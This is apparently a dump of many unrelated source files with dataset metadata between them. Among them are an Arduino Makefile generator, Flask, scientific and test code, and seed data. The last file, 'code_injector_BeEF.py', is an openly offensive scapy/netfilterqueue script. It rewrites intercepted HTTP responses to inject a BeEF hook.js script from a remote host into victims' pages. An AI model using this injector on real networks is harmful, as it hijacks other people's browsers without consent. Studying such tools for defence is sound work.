Copyright 2012 Rodrigo Pinheiro Matias <rodrigopmatias@gmail.com>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
templates = {
'static_link': '''
\t@$(AR) rcs %(lib)s %(obj)s
\t@echo " [\033[33m\033[1mAR\033[0m] - \033[37m\033[1m%(obj)s\033[0m to \033[37m\033[1m%(lib)s\033[0m"''',
'c_obj_ruler': '''%(obj)s: %(source)s
\t@$(CC) $(CFLAGS) $(INCLUDE) -c %(source)s -o %(obj)s 1>> compile.log 2>> compile.err
\t@echo " [\033[33m\033[1mCC\033[0m] - \033[37m\033[1m%(source)s\033[0m"''',
'asm_obj_ruler': '''%(obj)s: %(source)s
\t@$(AS) $(ASFLAGS) -o %(obj)s %(source)s 1>> compile.log 2>> compile.err
\t@echo " [\033[33m\033[1mAS\033[0m] - \033[37m\033[1m%(source)s\033[0m"''',
'c_asm_ruler': '''%(obj)s: %(source)s
\t@$(CC) $(CFLAGS) $(INCLUDE) -c %(source)s -S -o %(obj)s 1>> compile.log 2>> compile.err
\t@echo " [\033[33m\033[1mCC\033[0m] - \033[37m\033[1m%(source)s\033[0m"''',
'cxx_obj_ruler': '''%(obj)s: %(source)s
\t@$(CXX) $(CXXFLAGS) $(INCLUDE) -c %(source)s -o %(obj)s 1>> compile.log 2>> compile.err
\t@echo " [\033[33m\033[1mCXX\033[0m] - \033[37m\033[1m%(source)s\033[0m"''',
'cxx_asm_ruler': '''%(obj)s: %(source)s
\t@$(CXX) $(CXXFLAGS) $(INCLUDE) -c %(source)s -S -o %(obj)s 1>> compile.log 2>> compile.err
\t@echo " [\033[33m\033[1mCXX\033[0m] - \033[37m\033[1m%(source)s\033[0m"''',
'avr-main.cc': '''/**
* Generated with sketch %(version)s
**/
#include <avr/sleep.h>
int main(void) {
for(;;)
sleep_mode();
return 0;
}''',
'main.cc': '''/**
* Generated with sketch %(version)s
**/
#include <Arduino.h>
/**
* Setup of the firmware
**/
void setup() {
}
/**
* Schedule events for firmware program
**/
void loop() {
delay(250);
}''',
'Makefile': '''##########################################
# Makefile generated with sketch %(version)s
##########################################
# Defines of Arduino
ARDUINO_HOME=%(sdk_home)s
ARDUINO_CORE=$(ARDUINO_HOME)/hardware/arduino/cores
ARDUINO_VARIANT=$(ARDUINO_HOME)/hardware/arduino/variants/%(variant)s
# Define toolchain
CC=%(cc)s
CXX=%(cxx)s
AS=%(asm)s
LD=%(ld)s
AR=%(ar)s
OBJCOPY=%(objcopy)s
SIZE=%(size)s
AVRDUDE=%(avrdude)s
PROGRAMER=%(programer)s
LIB=
INCLUDE=-I$(ARDUINO_CORE)/arduino -I$(ARDUINO_VARIANT) -I$(ARDUINO_CORE) -I lib/
#Define of MCU
MCU=%(mcu)s
CLOCK=%(clock_hz)sUL
ARDUINO=%(sdk_version)s
# Define compiler flags
_CFLAGS=-Os -Wall -fno-exceptions -ffunction-sections -fdata-sections -mmcu=$(MCU) \\
-DF_CPU=$(CLOCK) -MMD -DARDUINO=$(ARDUINO) \\
-fpermissive -lm -Wl,-u,vfprintf -lprintf_min
CFLAGS=$(_CFLAGS) -std=c99
CXXFLAGS=$(_CFLAGS) -std=c++98
ASFLAGS=-mmcu $(MCU)
# Define compiler rulers
OBJ=%(obj_dep)s
CORE_OBJ=%(core_obj_dep)s
AOUT=binary/%(project_name)s-%(mcu)s.elf
HEX=binary/%(project_name)s-%(mcu)s.hex
EPP=binary/%(project_name)s-%(mcu)s.epp
CORE_LIB=binary/core.a
LIB_DEPS=%(lib_deps)s
LD_FLAGS=-Os -Wl,--gc-sections -mmcu=$(MCU) -lm
AVRDUDE_OPTIONS = -p$(MCU) -c$(PROGRAMER) %(pgrextra)s -Uflash:w:$(HEX):i
SIZE_OPTS=-C --mcu=$(MCU)
CONFIG_EXISTS=$(shell [ -e "Makefile.config" ] && echo 1 || echo 0)
ifeq ($(CONFIG_EXISTS), 1)
include Makefile.config
endif
all: $(HEX) $(EPP)
rebuild: clean all
deploy: $(HEX)
\t$(AVRDUDE) $(AVRDUDE_OPTIONS)
$(HEX): $(EPP)
\t@echo " [\033[33m\033[1mOBJCOPY\033[0m] - \033[37m\033[1mFirmware\033[0m"
\t@$(OBJCOPY) -O ihex -R .eeprom $(AOUT) $(HEX)
$(EPP): $(AOUT)
\t@echo " [\033[33m\033[1mOBJCOPY\033[0m] - \033[37m\033[1mMemory of EEPROM\033[0m"
\t@$(OBJCOPY) -O ihex -j .eeprom --set-section-flags=.eeprom=alloc,load --no-change-warnings --change-section-lma .eeprom=0 $(AOUT) $(EPP)
size: $(AOUT)
\t@$(SIZE) $(SIZE_OPTS) $(AOUT)
$(AOUT): clear-compiler $(OBJ) $(CORE_LIB) $(LIB_DEPS)
\t@echo " [\033[33m\033[1mLD\033[0m] - \033[37m\033[1m$(AOUT)\033[0m"
\t@$(CXX) $(LD_FLAGS) $(LIB) $(OBJ) $(CORE_LIB) $(LIB_DEPS) -o $(AOUT)
$(CORE_LIB): $(CORE_OBJ)%(core_ruler)s
%(asm_rulers)s
%(obj_rulers)s
%(libs_rulers)s
%(core_asm_rulers)s
%(core_obj_rulers)s
clear-compiler:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear compiler logs"
\trm -f compile.*
clean-tmp:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear temporary files"
\t@rm -f tmp/*
clean-bin:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear binary files"
\t@rm -f binary/*
clean:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear temporary files"
\t@rm -f tmp/*
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear binary files"
\t@rm -f binary/*
''',
'avr-Makefile': '''##########################################
# Makefile generated with sketch %(version)s
##########################################
# Define toolchain
CC=%(cc)s
CXX=%(cxx)s
AS=%(asm)s
LD=%(ld)s
AR=%(ar)s
OBJCOPY=%(objcopy)s
SIZE=%(size)s
AVRDUDE=%(avrdude)s
PROGRAMER=%(programer)s
LIB=
INCLUDE=-I lib/
#Define of MCU
MCU=%(mcu)s
CLOCK=%(clock_hz)sUL
# Define compiler flags
_CFLAGS=-Os -Wall -fno-exceptions -ffunction-sections -fdata-sections -mmcu=$(MCU) \\
-DF_CPU=$(CLOCK) -fpermissive -lm -Wl,-u,vfprintf -lprintf_min
CFLAGS=$(_CFLAGS) -std=c99
CXXFLAGS=$(_CFLAGS) -std=c++98
ASFLAGS=-mmcu $(MCU)
# Define compiler rulers
ASM=%(asm_dep)s
OBJ=%(obj_dep)s
LIB_DEPS=%(lib_deps)s
AOUT=binary/%(project_name)s-%(mcu)s.elf
HEX=binary/%(project_name)s-%(mcu)s.hex
EPP=binary/%(project_name)s-%(mcu)s.epp
LD_FLAGS=-Os -Wl,--gc-sections -mmcu=$(MCU) -lm
AVRDUDE_OPTIONS = -p$(MCU) -c$(PROGRAMER) %(pgrextra)s -Uflash:w:$(HEX):i
SIZE_OPTS=-A
CONFIG_EXISTS=$(shell [ -e "Makefile.config" ] && echo 1 || echo 0)
ifeq ($(CONFIG_EXISTS), 1)
include Makefile.config
endif
all: $(HEX) $(EPP)
rebuild: clean all
deploy: $(HEX)
\t$(AVRDUDE) $(AVRDUDE_OPTIONS)
$(HEX): $(EPP)
\t@echo " [\033[33m\033[1mOBJCOPY\033[0m] - \033[37m\033[1mFirmware\033[0m"
\t@$(OBJCOPY) -O ihex -R .eeprom $(AOUT) $(HEX)
$(EPP): $(AOUT)
\t@echo " [\033[33m\033[1mOBJCOPY\033[0m] - \033[37m\033[1mMemory of EEPROM\033[0m"
\t@$(OBJCOPY) -O ihex -j .eeprom --set-section-flags=.eeprom=alloc,load --no-change-warnings --change-section-lma .eeprom=0 $(AOUT) $(EPP)
size: $(AOUT)
\t@$(SIZE) $(SIZE_OPTS) $(AOUT)
$(AOUT): clear-compiler $(OBJ) $(LIB_DEPS)
\t@echo " [\033[33m\033[1mLD\033[0m] - \033[37m\033[1m$(AOUT)\033[0m"
\t@$(CXX) $(LD_FLAGS) $(LIB) $(OBJ) $(LIB_DEPS) -o $(AOUT)
%(asm_rulers)s
%(obj_rulers)s
%(libs_rulers)s
clear-compiler:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear compiler logs"
\t@rm -f compile.*
clean-tmp:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear temporary files"
\t@rm -f tmp/*
clean-bin:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear binary files"
\t@rm -f binary/*
clean:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear temporary files"
\t@rm -f tmp/*
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear binary files"
\t@rm -f binary/*
'''
}
| 27.518797 | 138 | 0.630464 |
c7a9d270039cb319b1e7bd45460f8d2badbcbfe0 | 1,562 | py | Python | Tic-Tac-Pi/gameObjects/TextObject.py | mstubinis/Tic-Tac-Pi | b96db58332be4975f4a5b18b6dd45a0eac859528 | [
"MIT"
] | 2 | 2016-04-13T02:52:46.000Z | 2017-11-20T22:41:36.000Z | Tic-Tac-Pi/gameObjects/TextObject.py | mstubinis/Tic-Tac-Pi | b96db58332be4975f4a5b18b6dd45a0eac859528 | [
"MIT"
] | null | null | null | Tic-Tac-Pi/gameObjects/TextObject.py | mstubinis/Tic-Tac-Pi | b96db58332be4975f4a5b18b6dd45a0eac859528 | [
"MIT"
] | 3 | 2016-04-14T02:29:32.000Z | 2020-04-27T06:08:07.000Z | import pygame
from pygame.locals import *
import resourceManager
| 31.24 | 68 | 0.596031 |
c7aa2635f7e1d5416d843dacc6078257816ee795 | 2,268 | py | Python | src/encoded/server_defaults.py | beta-cell-network/beta-cell-nw | 093b078fdb7932ebfcbc0715aeeb2261eda3ee52 | [
"MIT"
] | 4 | 2018-01-04T22:31:08.000Z | 2021-07-15T17:39:16.000Z | src/encoded/server_defaults.py | beta-cell-network/beta-cell-nw | 093b078fdb7932ebfcbc0715aeeb2261eda3ee52 | [
"MIT"
] | 7 | 2017-10-31T23:47:47.000Z | 2022-01-10T00:12:42.000Z | src/encoded/server_defaults.py | beta-cell-network/beta-cell-nw | 093b078fdb7932ebfcbc0715aeeb2261eda3ee52 | [
"MIT"
] | 10 | 2017-09-14T00:57:07.000Z | 2021-07-27T23:41:14.000Z | from datetime import datetime
from jsonschema_serialize_fork import NO_DEFAULT
from pyramid.security import effective_principals
from pyramid.threadlocal import get_current_request
from string import (
digits,
ascii_uppercase,
)
import random
import uuid
from snovault.schema_utils import server_default
ACCESSION_FACTORY = __name__ + ':accession_factory'
ENC_ACCESSION_FORMAT = (digits, digits, digits, ascii_uppercase, ascii_uppercase, ascii_uppercase)
TEST_ACCESSION_FORMAT = (digits, ) * 6
def test_accession(accession_type):
""" Test accessions are generated on test.encodedcc.org
"""
random_part = ''.join(random.choice(s) for s in TEST_ACCESSION_FORMAT)
return 'D' + accession_type + random_part
| 28 | 98 | 0.740741 |
c7aa99e86ce9b9941bb3c2dee52be602130563cd | 200 | py | Python | app/__init__.py | geirowew/SapAPI | dda0d839722d28c7a30d58c8b3d5076a503fd837 | [
"MIT"
] | 1 | 2021-10-11T20:20:50.000Z | 2021-10-11T20:20:50.000Z | app/__init__.py | geirowew/SapAPI | dda0d839722d28c7a30d58c8b3d5076a503fd837 | [
"MIT"
] | null | null | null | app/__init__.py | geirowew/SapAPI | dda0d839722d28c7a30d58c8b3d5076a503fd837 | [
"MIT"
] | 2 | 2021-01-22T10:52:04.000Z | 2021-10-06T10:28:07.000Z | from flask import Flask
#from config import Config
import config
app = Flask(__name__)
#app.config.from_object(Config)
app.config.from_object(config)
#from app import routes
from app import gettoken | 20 | 31 | 0.81 |
c7ae90de0db880bd9c87e6ef499b2ab425e89a1b | 19 | py | Python | todo/task/__init__.py | BenMcLean981/flask-todo | 9827f4993c7d4af0c42ed2a891f2eb56227f1644 | [
"MIT"
] | null | null | null | todo/task/__init__.py | BenMcLean981/flask-todo | 9827f4993c7d4af0c42ed2a891f2eb56227f1644 | [
"MIT"
] | null | null | null | todo/task/__init__.py | BenMcLean981/flask-todo | 9827f4993c7d4af0c42ed2a891f2eb56227f1644 | [
"MIT"
] | null | null | null | """Todo module."""
| 9.5 | 18 | 0.526316 |
c7aedff29cfbc578d32b6b83c7dce7618a9b1e46 | 680 | py | Python | src/pvt_model/pvt_system/pipe.py | BenWinchester/PVTModel | 6bf3976b06f406f632e0a9e525cd8b05359da239 | [
"MIT"
] | 1 | 2021-05-11T14:15:11.000Z | 2021-05-11T14:15:11.000Z | src/pvt_model/pvt_system/pipe.py | BenWinchester/PVTModel | 6bf3976b06f406f632e0a9e525cd8b05359da239 | [
"MIT"
] | 14 | 2021-02-23T11:53:08.000Z | 2021-11-16T10:45:31.000Z | src/pvt_model/pvt_system/pipe.py | BenWinchester/PVTModel | 6bf3976b06f406f632e0a9e525cd8b05359da239 | [
"MIT"
] | null | null | null | #!/usr/bin/python3.7
########################################################################################
# pvt_collector/pipe.py - Represents a pipe within the system.
#
# Author: Ben Winchester
# Copyright: Ben Winchester, 2021
########################################################################################
"""
The pipe module for the PV-T model.
This module represents a pipe within the PV-T system.
"""
from dataclasses import dataclass
__all__ = ("Pipe",)
| 21.25 | 88 | 0.507353 |
c7b0b81ceafaed0e74acb2a5f98af6b65a8f276d | 1,850 | py | Python | tests/test_api_account_state.py | luisparravicini/ioapi | f9d60a28032fd54163ea15b8256aba1d48ec4dcc | [
"MIT"
] | null | null | null | tests/test_api_account_state.py | luisparravicini/ioapi | f9d60a28032fd54163ea15b8256aba1d48ec4dcc | [
"MIT"
] | null | null | null | tests/test_api_account_state.py | luisparravicini/ioapi | f9d60a28032fd54163ea15b8256aba1d48ec4dcc | [
"MIT"
] | 1 | 2020-05-03T04:34:32.000Z | 2020-05-03T04:34:32.000Z | import unittest
import os
import json
import requests
import requests_mock
from ioapi import api_url, IOService, AuthorizationError, UnexpectedResponseCodeError
| 31.355932 | 85 | 0.656216 |
c7b0f4e12943a98dbd413a45f48a80cdcaf7bcf6 | 6,517 | py | Python | testData/devSeedData.py | bgporter/wastebook | 79885a8d503452e1fbeb8ff445cedd2daafff2a0 | [
"MIT"
] | null | null | null | testData/devSeedData.py | bgporter/wastebook | 79885a8d503452e1fbeb8ff445cedd2daafff2a0 | [
"MIT"
] | null | null | null | testData/devSeedData.py | bgporter/wastebook | 79885a8d503452e1fbeb8ff445cedd2daafff2a0 | [
"MIT"
] | null | null | null | '''
fake posts to bootstrap a development database. Put any interesting cases
useful for development in here.
'''
from datetime import datetime
POST_DATA_1 = [
{
"created" : datetime(2015, 10, 1),
"published": datetime(2015, 10, 1),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "First Post",
"slug": "",
"text": "a bunch of words #foo #bar",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 10, 2),
"published": datetime(2015, 10, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": False,
"status": "published",
"title": "Second Post",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 10, 2),
"published": datetime(2015, 10, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": False,
"status": "draft",
"title": "Third Post",
"slug": "",
"text": "This is a #draft #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 10, 2),
"published": datetime(2015, 10, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "draft",
"title": "Fourth Post",
"slug": "",
"text": "This is a #draft #post",
"tags": [],
"type": "Post"
},
]
POST_DATA_2 = [
{
"created" : datetime(2015, 3, 2),
"published": datetime(2015, 3, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 1",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 4, 2),
"published": datetime(2015, 4, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 2",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 5, 2),
"published": datetime(2015, 5, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 3",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 5, 2),
"published": datetime(2015, 5, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 4",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 6, 2),
"published": datetime(2015, 6, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 5",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 6, 2),
"published": datetime(2015, 6, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 6",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 6, 2),
"published": datetime(2015, 6, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 7",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 7, 2),
"published": datetime(2015, 7, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 8",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 8, 2),
"published": datetime(2015, 8, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 9",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 9, 2),
"published": datetime(2015, 9, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 10",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
{
"created" : datetime(2015, 10, 2),
"published": datetime(2015, 10, 2),
"edited": datetime(2015, 10, 1),
"rendered": None,
"author": "bgporter",
"public": True,
"status": "published",
"title": "Post 11",
"slug": "",
"text": "This is a #secret #post",
"tags": [],
"type": "Post"
},
] | 29.224215 | 77 | 0.399724 |
c7b11734daef5c05aa9cf025632e59324996f20e | 2,954 | py | Python | customer_support/utils.py | rtnpro/django-customer-support | 6de8d9301fe01a42fa6799757a107be69ee82426 | [
"MIT"
] | 1 | 2017-05-06T04:49:45.000Z | 2017-05-06T04:49:45.000Z | customer_support/utils.py | rtnpro/django-customer-support | 6de8d9301fe01a42fa6799757a107be69ee82426 | [
"MIT"
] | null | null | null | customer_support/utils.py | rtnpro/django-customer-support | 6de8d9301fe01a42fa6799757a107be69ee82426 | [
"MIT"
] | null | null | null | from __future__ import absolute_import
from django.shortcuts import render
import simplejson
import datetime
from django.http import HttpResponse
| 25.912281 | 69 | 0.613067 |
c7b4d983814129255c3038e65a92199d05319e32 | 6,061 | py | Python | tobit.py | AlvaroCorrales/tobit | 6993b1cfe58010cd59aac477ced3c2525342244f | [
"MIT"
] | 1 | 2021-04-13T03:14:01.000Z | 2021-04-13T03:14:01.000Z | tobit.py | AlvaroCorrales/tobit | 6993b1cfe58010cd59aac477ced3c2525342244f | [
"MIT"
] | null | null | null | tobit.py | AlvaroCorrales/tobit | 6993b1cfe58010cd59aac477ced3c2525342244f | [
"MIT"
] | null | null | null | import math
import warnings
import numpy as np
import pandas as pd
from scipy.optimize import minimize
import scipy.stats
from scipy.stats import norm # edit
from scipy.special import log_ndtr
from sklearn.linear_model import LinearRegression
from sklearn.metrics import mean_squared_error, mean_absolute_error
| 33.120219 | 123 | 0.620855 |
c7b509b05f7f3079575b9250d0a2891a9795c878 | 1,554 | py | Python | setup.py | Raymond38324/hagworm | 196d4735719f586d52a1cd9f21aedd00e16b59b0 | [
"Apache-2.0"
] | null | null | null | setup.py | Raymond38324/hagworm | 196d4735719f586d52a1cd9f21aedd00e16b59b0 | [
"Apache-2.0"
] | null | null | null | setup.py | Raymond38324/hagworm | 196d4735719f586d52a1cd9f21aedd00e16b59b0 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
import setuptools
with open(r'README.md', r'r', encoding="utf8") as stream:
long_description = stream.read()
setuptools.setup(
name=r'hagworm',
version=r'3.0.0',
license=r'Apache License Version 2.0',
platforms=[r'all'],
author=r'Shaobo.Wang',
author_email=r'wsb310@gmail.com',
description=r'Network Development Suite',
long_description=long_description,
long_description_content_type=r'text/markdown',
url=r'https://github.com/wsb310/hagworm',
packages=setuptools.find_packages(),
package_data={r'hagworm': [r'static/*.*']},
python_requires=r'>= 3.7',
install_requires=[
r'aioftp==0.13.0',
r'aiohttp==3.5.4',
r'aiokafka==0.5.2',
r'aiomysql==0.0.20',
r'aioredis==1.2.0',
r'cacheout==0.11.1',
r'crontab==0.22.6',
r'cryptography==2.7.0',
r'hiredis==1.0.0',
r'Jinja2==2.10.1',
r'tornado-jinja2==0.2.4',
r'loguru==0.3.0',
r'motor==2.0.0',
r'mq_http_sdk==1.0.1',
r'objgraph==3.4.1',
r'Pillow==6.1.0',
r'psutil==5.6.3',
r'PyJWT==1.7.1',
r'pytest==5.0.1',
r'pytest-asyncio==0.10.0',
r'Sphinx==2.1.2',
r'SQLAlchemy==1.3.5',
r'tornado==6.0.3',
r'xlwt==1.3.0',
r'xmltodict==0.12.0',
],
classifiers=[
r'Programming Language :: Python :: 3.7',
r'License :: OSI Approved :: Apache Software License',
r'Operating System :: POSIX :: Linux',
],
)
| 28.254545 | 62 | 0.548263 |
c7b513ddbd33e479f8df70d1c5b9306a2ec0133a | 3,072 | py | Python | mercury_ml/keras/containers.py | gabrieloexle/mercury-ml | cc663f84a26ee66ae105bbfc0cd1cbd5629031cd | [
"MIT"
] | null | null | null | mercury_ml/keras/containers.py | gabrieloexle/mercury-ml | cc663f84a26ee66ae105bbfc0cd1cbd5629031cd | [
"MIT"
] | null | null | null | mercury_ml/keras/containers.py | gabrieloexle/mercury-ml | cc663f84a26ee66ae105bbfc0cd1cbd5629031cd | [
"MIT"
] | null | null | null | """
Simple IoC containers that provide direct access to various Keras providers
"""
| 38.4 | 113 | 0.823893 |
c7b60df7ecb95aad435c61ec7e818259064a9562 | 1,851 | py | Python | Code Injector/code_injector_BeEF.py | crake7/Defensor-Fortis- | 086b055a10b9ac55f444e8d13b4031f998415438 | [
"MIT"
] | null | null | null | Code Injector/code_injector_BeEF.py | crake7/Defensor-Fortis- | 086b055a10b9ac55f444e8d13b4031f998415438 | [
"MIT"
] | null | null | null | Code Injector/code_injector_BeEF.py | crake7/Defensor-Fortis- | 086b055a10b9ac55f444e8d13b4031f998415438 | [
"MIT"
] | 1 | 2021-12-20T11:44:51.000Z | 2021-12-20T11:44:51.000Z | #!/usr/bin/env python
import netfilterqueue
import scapy.all as scapy
import re
def process_packet(packet):
"""Modify downloads files on the fly while target uses HTTP/HTTPS.
Do not forget to choose the port you will use on line 23 and 28 and uncomment them."""
scapy_packet = scapy.IP (packet.get_payload())
if scapy_packet.haslayer(scapy.Raw):
#try:
#.decode() in load
load = scapy_packet[scapy.Raw].load
if scapy_packet[scapy.TCP].dport == #CHOOSE PORT HERE: 80 / 10000:
print("HTTPS Request")
# print(scapy_packet.show())
load = re.sub("Accept-Encoding:.*?\\r\\n", "", load)
elif scapy_packet[scapy.TCP].sport == #CHOOSE PORT HERE: 80 / 10000:
print("HTTPS Response")
#print(scapy_packet.show())
injection_code = '<script src="http://10.0.2.15:3000/hook.js"></script>'
load = load.replace("</body>", injection_code + "</body>")
content_length_search = re.search("(?:Content-Length:\s)(\d*)", load)
if content_length_search and "text/html" in load:
content_length = content_length_search.group(1)
new_content_length = int(content_length) + len(injection_code)
load = load.replace(content_length, str(new_content_length))
if load != scapy_packet[scapy.Raw].load:
new_packet = set_load(scapy_packet, load)
packet.set_payload(str(new_packet))
#except UnicodeDecodeError:
# pass
packet.accept()
queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()
| 37.02 | 90 | 0.622366 |